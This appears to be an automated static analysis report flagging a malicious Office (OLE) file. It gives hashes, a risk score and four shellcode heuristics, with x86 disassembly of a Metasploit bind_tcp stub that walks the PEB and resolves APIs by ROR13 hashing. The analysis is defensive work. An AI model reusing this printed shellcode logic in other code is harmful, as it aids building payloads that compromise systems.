Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eca6aaf7a0bcabac…

MALICIOUS

Office (OLE)

19.0 KB First seen: 2012-07-06
MD5: 557c318587dab6a0d5ecdcc132a0ae7d SHA-1: 77e46bc0453bbf9ec60a6bf28c864b70dd16a60c SHA-256: eca6aaf7a0bcabac2dbb88d4a30f28219d79ffd3d06612e9c0a96130436bd76a
180 Risk Score

Heuristics 4

  • Metasploit bind_tcp shellcode critical SC_MSF_BIND
    Metasploit bind_tcp shellcode
    Disassembly
    x86 disassembly · validity: code (0.864) — 11/11 branch targets land on an instruction boundary (100% coherence)
    00000637  fc                cld
    00000638  e889000000        call 0x6c6
    0000063D  60                pushal
    0000063E  89e5              mov ebp, esp
    00000640  31d2              xor edx, edx
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as degenerate rather than coherent x86 code: a single mnemonic ('inc') accounts for 78% of the decoded instructions, which indicates a sled or padding/filler run rather than program logic.
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.862) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
    00000697  037df8            add edi, dword ptr [ebp - 8]
    0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
    0000069D  75e2              jne 0x681
    0000069F  58                pop eax
    000006A0  8b                .byte 0x8b
    000006A1  58                pop eax
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing — a common import-resolution technique in position-independent shellcode
    Disassembly
    x86 disassembly · validity: code (0.862) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
    00000697  037df8            add edi, dword ptr [ebp - 8]
    0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
    0000069D  75e2              jne 0x681
    0000069F  58                pop eax
    000006A0  8b                .byte 0x8b
    000006A1  58                pop eax